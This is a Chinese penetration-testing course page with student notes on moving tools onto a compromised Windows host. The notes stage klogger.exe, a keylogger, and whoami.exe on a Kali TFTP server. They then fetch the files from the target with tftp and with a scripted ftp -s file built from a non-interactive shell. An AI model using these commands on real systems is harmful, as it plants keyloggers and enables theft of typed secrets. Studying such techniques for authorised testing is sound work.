默认计划
931人加入学习
(9人评价)
安全测试缓冲区溢出

购买过Kali Linux渗透测试、武官课程包、安全技术会员课程的学员不要再买此课程

价格 ¥ 300.00
该课程属于 高校公益行 | 网络安全实践训练营 请加入后再学习

windows

 tftp 文件上传基于udp文件协议应用层的文件传输工具

用途 比如说思科os更新升级 可以自己搭建一个tftp服务器 然后吧更新的文件放在tfto里面 然后在思科的交换机里面指定tftp的服务地址 自动下载链接替换现有tftp

tftp 不支持身份验证 明文传输 边境防火墙过滤

windows

whoami查看当前用户的命令

只有所有者的权限是nobady的时候才能被所有者使用 要不然就没有办法值

键盘记录器窃取对方在键盘山之行的命令 拿到机密信息

查看

通过安装脚本快点

[展开全文]

TFTP

·mkdir /tftp

·chown -R nobody /tftp/          //这样别人才能下载

 cp /usr/share/windos-binaries/klogger.exe /tftp/

atftpd --daemon --port 69 /tftp

 

 

[展开全文]

上传工具

 

 

TFTP

  • 基于UDP,应用层  常用于OS升级
  • 常被边界防火墙过滤

kali

mkdir /tftp

chown -R nobody /tftp/

cp /usr/share/windows-binaries/whoami.exe /tftp/

cp /usr/share/windows-binaries/klogger.exe /tftp/

atftpd --daemon --port 69 /tftp

netstat -pantu | grep 69

Windows

tftp -i +kali ip get whoami.exe 
tftp -i +kali ip get klogger.exe 

运行程序

 

 

FTP

注意:由于获取的shell是非交互性shell,不能输入密码,故连接FTP是将命令写入文件发送

echo open +kali ip +kali port >ftp.txt

echo ftp用户名>>ftp.txt

echo ftp密码>>ftp.txt

echo bin>>ftp.txt

echo GET whoami.exe>>ftp.txt

echo GET klogger.exe>>ftp.txt

echo bye>>ftp.txt

ftp -s:ftp.txt

 

[展开全文]